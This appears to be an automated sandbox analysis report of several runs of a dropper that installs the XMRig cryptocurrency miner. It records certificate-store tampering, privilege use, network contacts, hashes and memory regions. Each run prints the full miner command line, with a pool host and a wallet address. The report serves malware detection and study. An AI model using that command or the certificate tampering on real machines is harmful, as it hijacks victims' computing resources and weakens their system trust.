Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob omitted) C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 215.143.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:54

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1796s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob omitted) C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob omitted) C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 23.62.61.137:443 www.bing.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 137.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 97.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:55

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1789s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
NL 23.62.61.75:443 www.bing.com tcp
US 8.8.8.8:53 75.61.62.23.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 169.253.116.51.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


Analysis: behavioral17

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 22:10

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 107.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 168.253.116.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


Analysis: behavioral2

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:50

Platform

win10v2004-20240426-en

Max time kernel

1792s

Max time network

1796s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
NL 23.62.61.112:443 www.bing.com tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 112.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


Analysis: behavioral11

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:56

Platform

win10v2004-20240426-en

Max time kernel

1792s

Max time network

1790s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 106.246.116.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4736-16-0x00000118981F0000-0x0000011898210000-memory.dmp

memory/4736-17-0x0000011898240000-0x0000011898260000-memory.dmp

memory/4736-18-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-21-0x0000011898260000-0x0000011898280000-memory.dmp

memory/4736-20-0x0000011898280000-0x00000118982A0000-memory.dmp

memory/4736-19-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-22-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-23-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-25-0x0000011898260000-0x0000011898280000-memory.dmp

memory/4736-24-0x0000011898280000-0x00000118982A0000-memory.dmp

memory/4736-26-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-27-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-28-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-29-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-30-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-31-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-32-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-33-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-34-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-35-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-36-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-37-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-38-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-39-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-40-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-41-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-42-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-43-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-44-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-45-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-46-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-47-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-48-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-49-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-50-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-51-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-52-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-53-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-54-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-55-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-56-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-57-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-58-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-59-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-60-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-61-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-62-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-63-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-64-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-65-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-66-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-67-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-68-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-69-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-70-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-71-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-72-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-73-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-74-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-75-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-76-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-77-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-78-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-79-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-80-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-81-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-82-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-83-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-84-0x00007FF600730000-0x00007FF601233000-memory.dmp